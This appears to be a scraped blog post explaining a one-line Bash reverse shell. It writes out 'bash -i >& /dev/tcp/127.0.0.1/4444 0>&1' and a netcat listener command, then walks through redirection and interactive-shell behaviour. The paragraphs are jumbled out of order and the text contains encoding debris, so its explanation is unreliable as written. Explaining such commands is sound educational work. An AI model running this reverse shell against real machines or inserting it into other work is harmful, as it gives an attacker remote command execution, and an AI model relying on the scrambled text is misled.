For example, this will write the directory listing to the dir.list file: $ ls -l > dir.listĪ quick search through the good old man page reveals that >& target is just an alternative form of &> target, which in turn means 1> target 2>&1 - redirect both standard output and standard error streams to the target.Īt this point, I made a mistake thinking that >& /dev/tcp/127.0.0.1/4444 is merely a redirect of stdout and stderr to some special file /dev/tcp/127.0.0.1/4444 that automatically opens a TCP connection. Redirection is a feature available in most of the shells that allow you to change where command’s output goes, and input comes from. Ok, and why isn’t it interactive in our case? Those angle brackets in our command redirect standard streams this probably make Bash think that it isn’t running in the terminal. So why would we want an interactive shell? I think, just because it will be more like shells that we’re used to - with default aliases, correctly set PATH, and a prompt. It also says that Bash automatically starts in this interactive mode when there are no non-option arguments (unless you pass a command to execute with a -c) and when its standard input and error streams are both connected to terminals. Interactive BashĪccording to the Bash man page ( man bash), option -i means that we’re starting an “interactive shell.” The Invocation section then explains that non-interactive shell will not execute its startup files: all those /etc/profile, ~/.profile, ~/.bashrc, etc. $ bash -i >& /dev/tcp/127.0.0.1/4444 0>&1Īnd it works! Now, let’s figure it out one peace at the time, starting from bash -i. I didn’t want to run my shell over the open Internet, so I replaced 192.168.8.198 with the loopback IP 127.0.0.1: # (1) run in the first terminal # -n - do not try to inverse lookup IPs that connect to us Setupīryan then mentioned that this command is supposed to be used with a netcat, which is nc or ncat depending on your version, listening on port 4444 of the computer with IP 192.168.8.198: $ nc -v -n -l -p 4444 Skip to the Summary if you just want the answer.
![netcat reverse shell no e netcat reverse shell no e](https://i1.wp.com/www.androidgigs.com/wp-content/uploads/2019/05/setup-reverse-shell-linux.png)
I knew that it’s a reverse shell - a tool that connects the target computer back to you (hence the ‘reverse’) and then allows you to execute commands on that machine (‘shell’). Yesterday I saw a message from Bryan Brake on one of the BrakeSec Slack channels:
![netcat reverse shell no e netcat reverse shell no e](https://miro.medium.com/max/1480/1*oQnd8jfV_aeThfvPE4r2kw.png)
One Line Reverse Shell in Bash – Hypothetical Me Hypothetical Me